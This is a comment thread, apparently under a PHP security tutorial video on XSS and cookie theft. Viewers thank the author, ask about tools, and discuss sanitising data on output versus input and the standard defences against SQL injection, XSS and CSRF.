Damnit, I am writing a database, and just whistle in fear the end of each video. For example, where you expose the prevented javascript for example, it's actually scary how it would go through so quickly and unnoticed.. Thanks!
hello sir, I come across your video while I was trying to fix my cookie problem. when I inserted my cookies into the database and if I want to see them all in my cookie model I show your cart is empty while inside my database is having some products already inserted into them. could you please help me to fix that please or I can even send you the code to check it for me if necessary? thank you so much waiting to hear from you soon as possible.
Why not sanitize the data before entering the DB, I know you said something about it, but if you use htmlspecialchars or htmlentities before entering the DB I don't see why not do it before, rather than after?
+Wouter Dijkstra If you sanitise the data before it reaches the DB, then messing up once will leave you vulnerable everywhere the malicious data is displayed. If you sanitise as things come out, then you'll limit your exposure to where you messed up. Additionally, if you sanitise before then a screw up is harder to fix, because your security model relies on the database being trusted not to have executable html inside it. A single screw up invalidates that assumption, and you'd have to find every piece of malicious data in the DB before you'd be safe - even after fixing the flawed form. If you sanitise after, then to remove an exploit all you have to do is fix the vulnerable page. Then it won't matter if there is malicious html in the DB, because it won't be able to execute. When outputting data, just ask yourself whether the data really needs the ability to execute as html. If the answer is no, run it through the sanitisation function.
+meksaldi If a php file is include inside a other php file it isn't required to close PHP. Closing PHP while it is included in a other file could actually give you an error
ORM or PDO this will protect you from SQL injection. Twig or Smarty template framework This will protect you from XSS Token this will protect you from CSRF
You taught me php over ten years ago and still use it today. Thanks Alex
Nice work bro i was searching for this u helped me alot !
Damnit, I am writing a database, and just whistle in fear the end of each video.
For example, where you expose the prevented javascript for example, it's actually scary how it would go through so quickly and unnoticed.. Thanks!
simple, but quite precise. Nice video.
Really important and easy.
Thank you
Finally got it what am I looking for😊Thanku very much
man! like your reading my mind, nice tutorial.
Nice and easy! Thanks Alex.
Thanks for the vídeo Alex, hope you upload other kind of attacks.
Can anybody tell me what MySQL software here is to see and edit table rows?
you are the best
can i escape value before insert to db ?
hello sir, I come across your video while I was trying to fix my cookie problem. when I inserted my cookies into the database and if I want to see them all in my cookie model I show your cart is empty while inside my database is having some products already inserted into them. could you please help me to fix that please or I can even send you the code to check it for me if necessary? thank you so much waiting to hear from you soon as possible.
Is this still applies? or what will be the equivalent from 2015 to current year 2017?
What version of PHP are you using in this videos?
Still a problem
Why not sanitize the data before entering the DB, I know you said something about it, but if you use htmlspecialchars or htmlentities before entering the DB I don't see why not do it before, rather than after?
+Wouter Dijkstra If you sanitise the data before it reaches the DB, then messing up once will leave you vulnerable everywhere the malicious data is displayed. If you sanitise as things come out, then you'll limit your exposure to where you messed up.
Additionally, if you sanitise before then a screw up is harder to fix, because your security model relies on the database being trusted not to have executable html inside it. A single screw up invalidates that assumption, and you'd have to find every piece of malicious data in the DB before you'd be safe - even after fixing the flawed form.
If you sanitise after, then to remove an exploit all you have to do is fix the vulnerable page. Then it won't matter if there is malicious html in the DB, because it won't be able to execute.
When outputting data, just ask yourself whether the data really needs the ability to execute as html. If the answer is no, run it through the sanitisation function.
Why other videos of php security list are private?
What software for the database is he/are you using?
+Veslav I believe he uses Sequel Pro. If using Windows try HeidiSQL.
very helpful
:)
What if they don't use cookie?
very helpful
hi , Alex what u using editor
+Ali raad its Sublime Text3
So what about scripts we embed on our sites like facebook like box or a youtube embed? Can they potentially also steal cookies?
+Codecourse Noticed that in the functions.php file you did not closed the ?> file at the end, is this the way it should?
+meksaldi If a php file is include inside a other php file it isn't required to close PHP. Closing PHP while it is included in a other file could actually give you an error
Exactly what I thought :) Thanks for the verification :
you should use 'require_once' anyway... thats better and saver.
+Manolis Agkopian Ok re Manoli, euxaristw very much :D
Time when Alex was so underrated. 'Member?
ORM or PDO this will protect you from SQL injection.
Twig or Smarty template framework This will protect you from XSS
Token this will protect you from CSRF
SAMY IS MY HERO
this won't work on modern websites for php. LOLs.
+jasonc_tutorials Why not? It will work fine
Proof?
Still a problem